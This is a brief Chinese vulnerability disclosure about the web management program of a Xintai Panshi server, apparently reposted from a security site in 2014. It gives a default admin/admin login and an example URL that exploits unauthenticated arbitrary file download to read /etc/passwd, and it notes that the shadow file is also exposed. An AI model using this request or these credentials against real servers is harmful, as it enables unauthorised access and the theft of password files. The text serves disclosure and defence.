新太磐石服务器web管理程序任意文件下载下载

来源:黑吧安全网 浏览:761次 时间:2014-07-18
做网站找雨过天晴工作室

方便运维人员维护服务器的web程序多在内网

1.登陆默认口令admin/admin

2.未授权访问+任意文件下载(应用以root权限运行可以直接下载shadow文件)

http://172.22.131.16:8080/appadmin/appadmin/syslog/download.jsp?fileName=passwd&path=/etc/

3.数据库密码明文保存